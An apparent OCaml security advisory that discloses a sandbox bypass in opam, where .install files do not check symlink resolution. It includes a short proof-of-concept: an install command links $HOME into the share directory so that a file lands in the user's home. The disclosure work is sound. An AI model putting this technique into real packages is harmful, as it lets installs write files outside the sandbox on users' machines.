Installing files through .install files do not check symlinks resolution of the target path, and so can bypass sandboxing.
Let's imagine a test package whose test.install file looks like the following:
share_root: [
"test" {"blah/pwnd"}
]
and test.opam file:
opam-version: "2.0"
install: ["sh" "-c" "ln -s \"$HOME\" \"%{share}%/blah\""]
Installing this package will write the pwnd file in the home directory of the current user, bypassing sandboxing.
{
"human_link": "https://github.com/ocaml/security-advisories/tree/main/advisories/2026/OSEC-2026-10.md",
"osv": "https://github.com/ocaml/security-advisories/tree/generated-osv/2026/OSEC-2026-10.json",
"cwe": [
"CWE-693"
]
}